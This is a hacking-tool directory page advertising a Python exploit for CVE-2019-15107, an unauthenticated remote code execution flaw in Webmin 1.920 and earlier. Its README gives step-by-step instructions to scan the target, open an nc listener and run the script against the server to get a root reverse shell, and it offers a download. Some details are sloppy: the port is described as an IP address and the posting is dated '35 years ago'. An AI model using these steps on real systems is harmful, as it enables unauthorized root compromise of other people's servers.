Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Webmin_CVE-2019-15107 — CVE-2019–15107 - Unauthenticated RCE Webmin <=1.920 | Kitploit
Tools/GitHubGitHub/squid22/webmin_cve-2019-15107
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubsquid22/webmin_cve-2019-15107

Webmin_CVE-2019-15107

CVE-2019–15107 - Unauthenticated RCE Webmin <=1.920

View Repository
35 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019–15107 - Unauthenticated RCE Webmin <=1.920

This python script should give you a root shell on Webmin 1.890

Check with nmap:
nmap -sC -sV -p 10000 TARGET_IP

Result:
10000/tcp open http MiniServ 1.890 (Webmin httpd)

How to use this exploit:

Step 1: nc -lnvp LPORT

Step 2: chmod +x exploit.py

root@kitploit:~
./exploit RHOST RPORT LHOST LPORT

RHOST = the target
RPORT = the target IP address (Usually 10000)
LHOST = your kali box
LPORT = your reverse shell port

Step 3: Get a root shell!

DO NOT HARM UNAUTHORIZED SYSTEMS!!!

Download Tool